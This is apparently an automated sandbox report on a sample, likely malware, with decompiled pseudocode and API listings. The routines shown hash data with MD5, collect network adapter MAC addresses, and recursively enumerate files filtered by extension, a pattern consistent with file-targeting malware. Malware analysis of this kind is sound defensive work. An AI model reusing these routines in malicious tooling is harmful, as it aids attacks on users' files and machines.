0x0040e993
0x0040e9a2
0x0040e9a6
0x0040e9a8
0x0040e9b4
0x0040e9b4
0x0040e9b9
0x0040e9c0
0x0040e9d3
0x0040e9d8
0x0040e9df
0x0040e9f2
0x0040e9f5
0x0040e9f5
0x0040e9f8
0x0040e9f8
0x0040e9fa
0x0040e9fb
0x0040e9fb
0x0040ea04
0x0040ea08
0x0040ea0d
0x0040e9e1
0x0040e9e6
0x0040e9ea
0x0040e9ef
0x0040e9ef
0x00000000
0x0040e9df
0x0040ea11
0x0040ea1c
0x0040ea27
0x0040ea2d
0x0040ea31
0x0040ea36
0x0040ea3b
0x0040ea43
0x0040ea50
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
__CxxThrowException@8.LIBCMT ref: 0040E8E4

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
__CxxThrowException@8.LIBCMT ref: 0040E90F
CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
__CxxThrowException@8.LIBCMT ref: 0040E93E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
__CxxThrowException@8.LIBCMT ref: 0040E96F
_memset.LIBCMT ref: 0040E98E
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
__CxxThrowException@8.LIBCMT ref: 0040E9B4
_sprintf.LIBCMT ref: 0040E9D3

Strings

%.2X, xrefs: 0040E9CD

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
String ID: %.2X
API String ID: 1084002244-213608013
Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040EAA0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				long* _v32;
				int _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				long** _t42;
				int* _t43;
				char _t45;
				char _t51;
				intOrPtr _t58;
				void* _t72;
				intOrPtr* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				int _t89;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;
				void* _t94;
				intOrPtr _t96;
				intOrPtr _t97;
				void* _t99;

				 *[fs:0x0] = _t96;
				_t97 = _t96 - 0x38;
				_t73 = _a4;
				_v20 = _t97;
				_t88 = __ecx;
				_v32 = 0;
				_t92 = __edx;
				_v24 = 0;
				_v36 = 0;
				E004156D0(_a4, _t73, __ecx, 0x4ffca4);
				_t42 =  &_v32;
				_v8 = 0;
				__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000, 0, _t87, _t91, _t72,  *[fs:0x0], 0x4caa00, 0xffffffff);
				if(_t42 == 0) {
					_v40 = _t42;
					E00430ECA( &_v40, 0x5085b8);
				}
				_t43 =  &_v24;
				__imp__CryptCreateHash(_v32, 0x8003, 0, 0, _t43);
				if(_t43 == 0) {
					_v44 = _t43;
					_t43 = E00430ECA( &_v44, 0x5085b8);
				}
				__imp__CryptHashData(_v24, _t88, _t92, 0);
				if(_t43 == 0) {
					_v48 = _t43;
					E00430ECA( &_v48, 0x5085b8);
				}
				_t93 = __imp__CryptGetHashParam;
				_v28 = 0;
				_t45 =  *_t93(_v24, 2, 0,  &_v28, 0);
				_t105 = _t45;
				if(_t45 == 0) {
					_v52 = _t45;
					E00430ECA( &_v52, 0x5085b8);
				}
				_t89 = E00420BE4(_t73, _t88, _t105, _v28 + 1);
				_v36 = _t89;
				E0042B420(_t89, 0, _v28 + 1);
				_t99 = _t97 + 0x10;
				_t51 =  *_t93(_v24, 2, _t89,  &_v28, 0);
				if(_t51 == 0) {
					_v56 = _t51;
					E00430ECA( &_v56, 0x5085b8);
				}
				_t94 = 0;
				while(_t94 < _v28) {
					E004204A6( &_v72, "%.2X",  *(_t94 + _t89) & 0x000000ff);
					_t99 = _t99 + 0xc;
					if(_v72 != 0) {
						_t80 =  &_v72;
						_t35 = _t80 + 1; // 0x1
						_t86 = _t35;
						do {
							_t58 =  *_t80;
							_t80 = _t80 + 1;
							__eflags = _t58;
						} while (_t58 != 0);
						_push(_t80 - _t86);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					} else {
						_push(0);
						E00413EA0(_t73, _t73, _t89, _t94,  &_v72);
						_t94 = _t94 + 1;
					}
					L18:
				}
				E00422110(_t89);
				__imp__CryptDestroyHash(_v24);
				CryptReleaseContext(_v32, 0);
				 *[fs:0x0] = _v16;
				return 1;
				goto L18;
			}

0x0040eab1
0x0040eab8
0x0040eabc
0x0040eac1
0x0040eac4
0x0040eacf
0x0040ead6
0x0040ead8
0x0040eadf
0x0040eae6
0x0040eaf6
0x0040eaf9
0x0040eb01
0x0040eb09
0x0040eb0b
0x0040eb17
0x0040eb17
0x0040eb1c
0x0040eb2c
0x0040eb34
0x0040eb36
0x0040eb42
0x0040eb42
0x0040eb4e
0x0040eb56
0x0040eb58
0x0040eb64
0x0040eb64
0x0040eb69
0x0040eb7c
0x0040eb83
0x0040eb85
0x0040eb87
0x0040eb89
0x0040eb95
0x0040eb95
0x0040ebab
0x0040ebad
0x0040ebb4
0x0040ebb9
0x0040ebc8
0x0040ebcc
0x0040ebce
0x0040ebda
0x0040ebda
0x0040ebdf
0x0040ebe1
0x0040ebf4
0x0040ebf9
0x0040ec00
0x0040ec13
0x0040ec16
0x0040ec16
0x0040ec20
0x0040ec20
0x0040ec22
0x0040ec23
0x0040ec23
0x0040ec2c
0x0040ec30
0x0040ec35
0x0040ec02
0x0040ec07
0x0040ec0b
0x0040ec10
0x0040ec10
0x00000000
0x0040ec00
0x0040ec39
0x0040ec44
0x0040ec4f
0x0040ec5a
0x0040ec67
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
__CxxThrowException@8.LIBCMT ref: 0040EB17

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
__CxxThrowException@8.LIBCMT ref: 0040EB42
CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
__CxxThrowException@8.LIBCMT ref: 0040EB64
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
__CxxThrowException@8.LIBCMT ref: 0040EB95
_memset.LIBCMT ref: 0040EBB4
CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
__CxxThrowException@8.LIBCMT ref: 0040EBDA
_sprintf.LIBCMT ref: 0040EBF4
CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F

Strings

%.2X, xrefs: 0040EBEE

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
String ID: %.2X
API String ID: 1637485200-213608013
Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040E670(void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t14;
				char* _t15;
				void* _t35;
				void* _t36;
				void* _t37;
				char* _t41;
				void* _t44;
				void* _t45;

				_t33 = __ebx;
				_push(_t36);
				_v8 = 0x288;
				_t37 = E00420C62(__ebx, _t35, _t36, 0x12);
				_t41 = E00420C62(__ebx, _t35, _t37, 0x288);
				_t45 = _t44 + 8;
				_t49 = _t41;
				if(_t41 != 0) {
					_t14 =  &_v8;
					__imp__GetAdaptersInfo(_t41, _t14);
					__eflags = _t14 - 0x6f;
					if(_t14 != 0x6f) {
						L4:
						_t15 =  &_v8;
						__imp__GetAdaptersInfo(_t41, _t15);
						__eflags = _t15;
						if(_t15 == 0) {
							_push( *(_t41 + 0x199) & 0x000000ff);
							_push( *(_t41 + 0x198) & 0x000000ff);
							_push( *(_t41 + 0x197) & 0x000000ff);
							_push( *(_t41 + 0x196) & 0x000000ff);
							_push( *(_t41 + 0x195) & 0x000000ff);
							E004204A6(_t37, "%02X:%02X:%02X:%02X:%02X:%02X",  *(_t41 + 0x194) & 0x000000ff);
							_push(_t37);
							_t11 = _t41 + 0x1b0; // 0x1b0
							_push("Address: %s, mac: %s\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_push("\n");
							E00421F2D(_t33, _t37, _t41, __eflags);
							_t45 = _t45 + 0x30;
						}
						E00420BED(_t41);
						return _t37;
					} else {
						E00420BED(_t41);
						_t41 = E00420C62(_t33, _t35, _t37, _v8);
						_t45 = _t45 + 8;
						__eflags = _t41;
						if(__eflags == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					_push("Error allocating memory needed to call GetAdaptersinfo\n");
					E00421F2D(_t33, _t37, _t41, _t49);
					E00420BED(_t37);
					return 0;
				}
			}

0x0040e670
0x0040e675
0x0040e678
0x0040e689
0x0040e690
0x0040e692
0x0040e695
0x0040e697
0x0040e6b4
0x0040e6b9
0x0040e6bf
0x0040e6c2
0x0040e6db
0x0040e6db
0x0040e6e0
0x0040e6e6
0x0040e6e8
0x0040e6f1
0x0040e6f9
0x0040e701
0x0040e709
0x0040e711
0x0040e720
0x0040e725
0x0040e726
0x0040e72d
0x0040e732
0x0040e737
0x0040e73c
0x0040e741
0x0040e741
0x0040e745
0x0040e754
0x0040e6c4
0x0040e6c5
0x0040e6d2
0x0040e6d4
0x0040e6d7
0x0040e6d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0040e6d9
0x0040e699
0x0040e699
0x0040e699
0x0040e69e
0x0040e6a4
0x0040e6b3
0x0040e6b3

APIs

_malloc.LIBCMT ref: 0040E67F

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_malloc.LIBCMT ref: 0040E68B
_wprintf.LIBCMT ref: 0040E69E
_free.LIBCMT ref: 0040E6A4

Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13

GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
_free.LIBCMT ref: 0040E6C5
_malloc.LIBCMT ref: 0040E6CD
GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
_sprintf.LIBCMT ref: 0040E720
_wprintf.LIBCMT ref: 0040E732
_wprintf.LIBCMT ref: 0040E73C
_free.LIBCMT ref: 0040E745

Strings

%02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
Address: %s, mac: %s, xrefs: 0040E72D
Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
API String ID: 3901070236-1604013687
Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9

Uniqueness

Uniqueness Score: -1.00%

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E00410160(intOrPtr __ecx, intOrPtr* __edx, char _a4, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				char _v40;
				signed int _v44;
				signed int _v48;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				char _v96;
				signed int _v100;
				signed int _v104;
				WCHAR* _v108;
				short _v120;
				signed int _v124;
				signed int _v128;
				char _v144;
				intOrPtr* _v148;
				struct _WIN32_FIND_DATAW _v740;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t270;
				intOrPtr _t280;
				WCHAR* _t288;
				short _t291;
				signed int _t293;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				intOrPtr _t303;
				WCHAR* _t308;
				void* _t309;
				void* _t313;
				void* _t330;
				signed int _t334;
				WCHAR* _t335;
				WCHAR* _t346;
				WCHAR* _t348;
				void* _t405;
				void* _t411;
				intOrPtr _t413;
				intOrPtr _t414;
				void* _t415;
				intOrPtr* _t418;
				signed int _t420;
				intOrPtr* _t423;
				signed int _t425;
				char* _t431;
				char* _t432;
				intOrPtr* _t434;
				signed int _t436;
				intOrPtr* _t439;
				intOrPtr* _t441;
				short* _t445;
				short* _t447;
				signed int _t450;
				signed int _t453;
				WCHAR* _t454;
				short* _t455;
				signed int _t460;
				intOrPtr* _t468;
				void* _t470;
				void* _t471;
				void* _t472;
				intOrPtr _t475;
				intOrPtr _t476;
				signed int _t477;
				signed int _t480;
				void* _t481;
				void* _t482;
				WCHAR* _t484;
				intOrPtr _t490;
				signed int* _t491;
				void* _t492;
				WCHAR* _t494;
				short _t495;
				intOrPtr _t496;
				void* _t497;
				void* _t498;
				short* _t501;
				short* _t502;
				void* _t503;
				short* _t504;

				_push(0xffffffff);
				_push(0x4cab68);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t496;
				_t497 = _t496 - 0x2d4;
				_t410 = __edx;
				_v72 = __ecx;
				_v148 = __edx;
				_v8 = 0;
				E00411AB0();
				_t480 = 0;
				_t490 = (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__edx + 4)) -  *__edx) >> 0x20 >> 2);
				_v68 = _t490;
				if(_t490 == 0) {
					L15:
					_v76 = 7;
					_v80 = 0;
					_v96 = 0;
					_v8 = 3;
					_push(0xffffffff);
					_v44 = 7;
					 *((intOrPtr*)(_v72 + 0x8bc)) = 1;
					_v64 = 0;
					_v48 = 0;
					E00414690(_t410,  &_v64,  &_a4, 0);
					_v8 = 4;
					_t411 = PathFindFileNameW;
					_t267 =  >=  ? _v64 :  &_v64;
					_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
					_v20 = 7;
					_v24 = 0;
					_v40 = 0;
					if( *_t468 != 0) {
						_t418 = _t468;
						_t79 = _t418 + 2; // 0x2
						_t490 = _t79;
						do {
							_t270 =  *_t418;
							_t418 = _t418 + 2;
						} while (_t270 != 0);
						_t420 = _t418 - _t490 >> 1;
						L24:
						_push(_t420);
						E00415C10(_t411,  &_v40, _t480, _t490, _t468);
						_v8 = 5;
						_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
						if( &_v64 != _t491) {
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_v44 = 7;
							_v48 = 0;
							_v64 = 0;
							if(_t491[5] >= 8) {
								_v64 =  *_t491;
								 *_t491 = 0;
							} else {
								_t384 = _t491[4] + 1;
								if(_t491[4] + 1 != 0) {
									E004205A0( &_v64, _t491, _t384 + _t384);
									_t497 = _t497 + 0xc;
								}
							}
							_v48 = _t491[4];
							_v44 = _t491[5];
							_t491[5] = 7;
							_t491[4] = 0;
							 *_t491 = 0;
						}
						if(_v124 >= 8) {
							L00422587(_v144);
							_t497 = _t497 + 4;
						}
						_t481 = 0;
						while(_v48 != 0 || _v24 != 0) {
							_t481 = _t481 + 1;
							_t278 =  >=  ? _v64 :  &_v64;
							_t468 = PathFindFileNameW( >=  ? _v64 :  &_v64);
							if( *_t468 != 0) {
								_t423 = _t468;
								_t109 = _t423 + 2; // 0x2
								_t491 = _t109;
								do {
									_t280 =  *_t423;
									_t423 = _t423 + 2;
								} while (_t280 != 0);
								_t425 = _t423 - _t491 >> 1;
								L42:
								_push(_t425);
								E00415C10(_t411,  &_v40, _t481, _t491, _t468);
								_t491 = E00413520( &_v64,  &_v144, 0, _v48 - _v24);
								if( &_v64 != _t491) {
									if(_v44 >= 8) {
										L00422587(_v64);
										_t497 = _t497 + 4;
									}
									_v44 = 7;
									_v48 = 0;
									_v64 = 0;
									if(_t491[5] >= 8) {
										_v64 =  *_t491;
										 *_t491 = 0;
									} else {
										_t372 = _t491[4] + 1;
										if(_t491[4] + 1 != 0) {
											E004205A0( &_v64, _t491, _t372 + _t372);
											_t497 = _t497 + 0xc;
										}
									}
									_v48 = _t491[4];
									_v44 = _t491[5];
									_t491[5] = 7;
									_t491[4] = 0;
									 *_t491 = 0;
								}
								if(_v124 >= 8) {
									L00422587(_v144);
									_t497 = _t497 + 4;
								}
								continue;
							}
							_t425 = 0;
							goto L42;
						}
						if(_t481 > 3) {
							L73:
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							_v8 = 3;
							_v20 = 7;
							_v24 = 0;
							_v40 = 0;
							if(_v44 >= 8) {
								L00422587(_v64);
								_t497 = _t497 + 4;
							}
							_t288 = E00417140( &_v144,  &_a4, "*");
							_t498 = _t497 + 4;
							if(_t288[0xa] >= 8) {
								_t288 =  *_t288;
							}
							_t482 = FindFirstFileW(_t288,  &_v740);
							if(_v124 >= 8) {
								L00422587(_v144);
								_t498 = _t498 + 4;
							}
							_v124 = 7;
							_t492 = 0;
							_v128 = 0;
							_v144 = 0;
							if(_t482 == 0xffffffff) {
								L119:
								if(_v76 >= 8) {
									L00422587(_v96);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v76 = 7;
								_v80 = 0;
								_v96 = 0;
								goto L122;
							} else {
								_t413 = _a28;
								do {
									_t431 = ".";
									_t293 =  &(_v740.cFileName);
									while(1) {
										_t470 =  *_t293;
										if(_t470 !=  *_t431) {
											break;
										}
										if(_t470 == 0) {
											L88:
											_t294 = 0;
											L90:
											if(_t294 == 0) {
												goto L117;
											}
											_t432 = L"..";
											_t298 =  &(_v740.cFileName);
											while(1) {
												_t471 =  *_t298;
												if(_t471 !=  *_t432) {
													break;
												}
												if(_t471 == 0) {
													L96:
													_t299 = 0;
													L98:
													if(_t299 == 0) {
														goto L117;
													}
													if((_v740.dwFileAttributes & 0x00000010) == 0) {
														_t492 = _t492 + 1;
														if(_t492 >= 0x400) {
															_t492 = 0;
															E00411AB0();
														}
														_v20 = 7;
														_push(0xffffffff);
														_v40 = 0;
														_v24 = 0;
														E00414690(_t413,  &_v40,  &_a4, 0);
														_v8 = 9;
														if(_v740.cFileName != 0) {
															_t434 =  &(_v740.cFileName);
															_t231 = _t434 + 2; // 0x2
															_t472 = _t231;
															do {
																_t303 =  *_t434;
																_t434 = _t434 + 2;
															} while (_t303 != 0);
															_t436 = _t434 - _t472 >> 1;
															goto L108;
														} else {
															_t436 = 0;
															L108:
															_push(_t436);
															E00415AE0(_t413,  &_v40, _t482, _t492,  &(_v740.cFileName));
															_t307 =  >=  ? _v40 :  &_v40;
															_t308 = PathFindExtensionW( >=  ? _v40 :  &_v40);
															_t439 = _v72 + 0x868;
															if( *((intOrPtr*)(_t439 + 0x14)) >= 8) {
																_t439 =  *_t439;
															}
															_push(_t308);
															_push(_t439);
															_t309 = E00421C02(_t439);
															_t498 = _t498 + 8;
															if(_t309 == 0) {
																_t441 = _v72 + 0x820;
																if( *((intOrPtr*)(_t441 + 0x14)) >= 8) {
																	_t441 =  *_t441;
																}
																_push(_t441);
																_t312 =  >=  ? _v40 :  &_v40;
																_push( >=  ? _v40 :  &_v40);
																_t313 = E00421C02(_t441);
																_t498 = _t498 + 8;
																if(_t313 == 0) {
																	E004136C0(_t413,  &_v40);
																}
															}
															L115:
															_v8 = 3;
															if(_v20 >= 8) {
																L00422587(_v40);
																_t498 = _t498 + 4;
															}
															goto L117;
														}
													}
													E00417140( &_v40,  &_a4,  &(_v740.cFileName));
													_push(1);
													_v8 = 8;
													E00415AE0(_t413,  &_v40, _t482, _t492, "\\");
													_push(_t413);
													_t501 = _t498 + 4 - 0x18;
													_t445 = _t501;
													_push(0xffffffff);
													 *(_t445 + 0x14) = 7;
													 *(_t445 + 0x10) = 0;
													 *_t445 = 0;
													E00414690(_t413, _t445,  &_v40, 0);
													E00410160(_v72, _v148);
													_t498 = _t501 + 0x1c;
													goto L115;
												}
												_t475 =  *((intOrPtr*)(_t298 + 2));
												_t209 =  &(_t432[2]); // 0x2e
												if(_t475 !=  *_t209) {
													break;
												}
												_t298 = _t298 + 4;
												_t432 =  &(_t432[4]);
												if(_t475 != 0) {
													continue;
												}
												goto L96;
											}
											asm("sbb eax, eax");
											_t299 = _t298 | 0x00000001;
											goto L98;
										}
										_t476 =  *((intOrPtr*)(_t293 + 2));
										_t206 =  &(_t431[2]); // 0x2e0000
										if(_t476 !=  *_t206) {
											break;
										}
										_t293 = _t293 + 4;
										_t431 =  &(_t431[4]);
										if(_t476 != 0) {
											continue;
										}
										goto L88;
									}
									asm("sbb eax, eax");
									_t294 = _t293 | 0x00000001;
									goto L90;
									L117:
								} while (FindNextFileW(_t482,  &_v740) != 0);
								FindClose(_t482);
								goto L119;
							}
						}
						_t502 = _t497 - 0x18;
						_t447 = _t502;
						_push(0xffffffff);
						 *(_t447 + 0x14) = 7;
						 *(_t447 + 0x10) = 0;
						 *_t447 = 0;
						E00414690(_t411, _t447,  &_a4, 0);
						_t330 = E0040F310(_t481, _t491);
						_t497 = _t502 + 0x18;
						if(_t330 != 0) {
							goto L73;
						}
						_push(0xffffffff);
						E00414690(_t411,  &_v96,  &_a4, 0);
						E00413A90(_t411,  &_v108, _t481, 0x400);
						_v8 = 6;
						_t450 = 0;
						_t334 = _v80;
						_t494 = _v108;
						if(_t334 == 0) {
							L57:
							_t414 = _v72;
							 *((short*)(_t494 + 2 + _t334 * 2)) = 0;
							_t335 = _t414 + 0x820;
							if(_t335[0xa] >= 8) {
								_t335 =  *_t335;
							}
							PathAppendW(_t494, _t335);
							_push(_v68);
							_v124 = 7;
							_v128 = 0;
							_v144 = 0;
							E00418400( &_v144, _t494, _v104);
							if(_v76 >= 8) {
								L00422587(_v96);
								_t497 = _t497 + 4;
							}
							_t453 = _v124;
							_v76 = 7;
							_v80 = 0;
							_v96 = 0;
							if(_t453 >= 8) {
								_v96 = _v144;
							} else {
								_t356 = _v128 + 1;
								if(_v128 + 1 != 0) {
									E004205A0( &_v96,  &_v144, _t356 + _t356);
									_t453 = _v124;
									_t497 = _t497 + 0xc;
								}
							}
							_v80 = _v128;
							_t343 =  >=  ? _v96 :  &_v96;
							_v76 = _t453;
							if(PathFileExistsW( >=  ? _v96 :  &_v96) == 0) {
								_t346 = E00420C62(_t414, _t468, _t481, 0x7d00);
								_t454 = _t414 + 0x838;
								_t503 = _t497 + 4;
								_t484 = _t346;
								if(_t454[0xa] >= 8) {
									_t454 =  *_t454;
								}
								lstrcpyW(_t484, _t454);
								_t348 = _t414 + 0x850;
								if( *((intOrPtr*)(_t414 + 0x864)) >= 8) {
									_t348 =  *_t348;
								}
								lstrcatW(_t484, _t348);
								_t504 = _t503 - 0x18;
								_t455 = _t504;
								_push(0xffffffff);
								 *(_t455 + 0x14) = 7;
								 *(_t455 + 0x10) = 0;
								 *_t455 = 0;
								E00414690(_t414, _t455,  &_v96, 0);
								E0040F0E0(_t484);
								E00420BED(_t484);
								_t497 = _t504 + 0x1c;
							}
							if(_t494 != 0) {
								L00422587(_t494);
								_t497 = _t497 + 4;
							}
							goto L73;
						}
						do {
							_t363 =  >=  ? _v96 :  &_v96;
							_t494[_t450] = ( >=  ? _v96 :  &_v96)[_t450];
							_t450 = _t450 + 1;
							_t334 = _v80;
						} while (_t450 < _t334);
						goto L57;
					}
					_t420 = 0;
					goto L24;
				} else {
					_t415 = 0;
					do {
						_v20 = 7;
						_push(0xffffffff);
						_v40 = 0;
						_v24 = 0;
						E00414690(_t415,  &_v40,  &_a4, 0);
						_v8 = 1;
						_push(0xffffffff);
						_v120 = 0;
						_v100 = 7;
						_v104 = 0;
						E00414690(_t415,  &_v120,  *_v148 + _t415, 0);
						_v8 = 2;
						_t477 = _v24;
						if(_t477 <= 1) {
							L10:
							if(_v100 >= 8) {
								L00422587(_v120);
								_t497 = _t497 + 4;
							}
							_v100 = 7;
							_v8 = 0;
							_v104 = 0;
							_v120 = 0;
							if(_v20 >= 8) {
								L00422587(_v40);
								_t497 = _t497 + 4;
							}
							goto L14;
						}
						_t460 = _v104;
						if(_t460 <= 1) {
							goto L10;
						} else {
							_t400 =  >=  ? _v40 :  &_v40;
							if( *((short*)(( >=  ? _v40 :  &_v40) + _t477 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v40, _t480, _t490, "\\");
								_t460 = _v104;
							}
							_t495 = _v120;
							_t402 =  >=  ? _t495 :  &_v120;
							if( *((short*)(( >=  ? _t495 :  &_v120) + _t460 * 2 - 2)) != 0x5c) {
								_push(1);
								E00415AE0(_t415,  &_v120, _t480, _t495, "\\");
								_t495 = _v120;
							}
							_t462 =  >=  ? _t495 :  &_v120;
							_t404 =  >=  ? _v40 :  &_v40;
							_t405 = E00420235(_t415, _t480, _t495,  >=  ? _v40 :  &_v40,  >=  ? _t495 :  &_v120);
							_t498 = _t497 + 8;
							if(_t405 == 0) {
								if(_v100 >= 8) {
									L00422587(_v120);
									_t498 = _t498 + 4;
								}
								_t291 = 0;
								_v100 = 7;
								_v104 = 0;
								_v120 = 0;
								if(_v20 >= 8) {
									_t291 = L00422587(_v40);
									_t498 = _t498 + 4;
								}
								L122:
								if(_a24 >= 8) {
									_t291 = L00422587(_a4);
								}
								 *[fs:0x0] = _v16;
								return _t291;
							} else {
								_t490 = _v68;
								goto L10;
							}
						}
						L14:
						_t480 = _t480 + 1;
						_t415 = _t415 + 0x18;
					} while (_t480 < _t490);
					goto L15;
				}
			}

0x00410163
0x00410165
0x00410170
0x00410171
0x00410178
0x00410180
0x00410182
0x00410186
0x0041018c
0x00410193
0x004101a2
0x004101b1
0x004101b3
0x004101b6
0x004102e8
0x004102ea
0x004102f1
0x004102f8
0x00410302
0x00410306
0x00410308
0x0041030f
0x0041031c
0x00410324
0x0041032b
0x00410330
0x0041033b
0x00410341
0x00410348
0x0041034a
0x00410353
0x0041035a
0x00410361
0x004103a6
0x004103a8
0x004103a8
0x004103b0
0x004103b0
0x004103b3
0x004103b6
0x004103bd
0x004103bf
0x004103bf
0x004103c4
0x004103c9
0x004103e5
0x004103ec
